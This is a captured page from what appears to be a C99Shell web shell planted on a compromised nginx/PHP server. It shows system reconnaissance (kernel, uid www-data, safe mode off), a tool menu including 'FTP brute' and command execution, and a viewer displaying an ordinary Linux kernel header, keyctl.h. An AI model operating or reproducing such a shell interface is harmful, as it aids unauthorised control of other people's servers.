!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/src/linux-oracle-5.13-headers-5.13.0-1018/include/linux/   drwxr-xr-x
Free 83.28 GB of 96.73 GB (86.1%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     keyctl.h (1.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0-or-later */
/* keyctl kernel bits
 *
 * Copyright (C) 2016 Red Hat, Inc. All Rights Reserved.
 * Written by David Howells ([email protected])
 */

#ifndef __LINUX_KEYCTL_H
#define __LINUX_KEYCTL_H

#include <uapi/linux/keyctl.h>

struct kernel_pkey_query {
    __u32        supported_ops;    /* Which ops are supported */
    __u32        key_size;    /* Size of the key in bits */
    __u16        max_data_size;    /* Maximum size of raw data to sign in bytes */
    __u16        max_sig_size;    /* Maximum size of signature in bytes */
    __u16        max_enc_size;    /* Maximum size of encrypted blob in bytes */
    __u16        max_dec_size;    /* Maximum size of decrypted blob in bytes */
};

enum kernel_pkey_operation {
    kernel_pkey_encrypt,
    kernel_pkey_decrypt,
    kernel_pkey_sign,
    kernel_pkey_verify,
};

struct kernel_pkey_params {
    struct key    *key;
    const char    *encoding;    /* Encoding (eg. "oaep" or "raw" for none) */
    const char    *hash_algo;    /* Digest algorithm used (eg. "sha1") or NULL if N/A */
    char        *info;        /* Modified info string to be released later */
    __u32        in_len;        /* Input data size */
    union {
        __u32    out_len;    /* Output buffer size (enc/dec/sign) */
        __u32    in2_len;    /* 2nd input data size (verify) */
    };
    enum kernel_pkey_operation op : 8;
};

#endif /* __LINUX_KEYCTL_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.004 ]--